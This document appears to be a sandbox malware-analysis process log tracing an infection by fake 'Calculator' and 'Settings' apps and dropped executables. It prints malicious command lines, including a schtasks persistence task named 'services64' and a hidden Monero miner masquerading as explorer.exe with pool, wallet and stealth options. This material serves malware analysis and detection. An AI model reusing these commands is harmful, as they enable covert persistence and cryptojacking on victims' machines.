C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffcc552dec0,0x7ffcc552ded0,0x7ffcc552dee06⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2476 /prefetch:16⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=2396 /prefetch:86⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=1716 /prefetch:86⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:26⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2484 /prefetch:16⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:26⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=3256 /prefetch:86⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=2696 /prefetch:86⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=3660 /prefetch:86⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=2348 /prefetch:86⤵
- Loads dropped DLL
- Adds Run key to start application
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=3448 /prefetch:86⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth8⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4316430.exe"C:\Users\Admin\AppData\Roaming\4316430.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\5699730.exe"C:\Users\Admin\AppData\Roaming\5699730.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\6454724.exe"C:\Users\Admin\AppData\Roaming\6454724.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\788088.exe"C:\Users\Admin\AppData\Roaming\788088.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Drops file in Windows directory
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 4482⤵
- Program crash
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6396 -ip 63961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4092 -ip 40921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2212 -ip 22121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3320 -ip 33201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4468 -ip 44681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 672 -p 6364 -ip 63641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2176 -ip 21761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 7024 -ip 70241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5584 -ip 55841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1120 -ip 11201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2624 -ip 26241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 2852 -ip 28521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 5048 -ip 50481⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3652 -ip 36521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5964 -ip 59641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5196 -ip 51961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 8339b8a3901ebc775730ad458de2a583 OA4En7LMH0egnJJlDMRm8Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6780 -ip 67801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1528 -ip 15281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1988 -ip 19881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5912 -ip 59121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 2496 -ip 24961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7556 -ip 75561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7548 -ip 75481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7752 -ip 77521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7920 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7396 -ip 73961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 7920 -ip 79201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7684 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 7684 -ip 76841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6516 -ip 65161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 5900 -ip 59001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FE93CA095283BE95C896B6F9B860EEFB C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D16043A1CD30750A36DA477DF81D5B8A C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0917CA864B128D49C7FD491ACCF936BB2⤵
- Blocklisted process makes network request
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B09FF2FDECD680D28AAC9554887447B7 C2⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--iUSIg"4⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x1f8,0x1f4,0x21c,0x1f0,0x7ffcc565dec0,0x7ffcc565ded0,0x7ffcc565dee05⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60da79e70,0x7ff60da79e80,0x7ff60da79e906⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1584 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2584 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2496 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=2412 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=1992 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3184 /prefetch:25⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=3240 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=3612 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=3616 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=1828 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=1576 /prefetch:85⤵
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D0BC.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5304 -ip 53041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
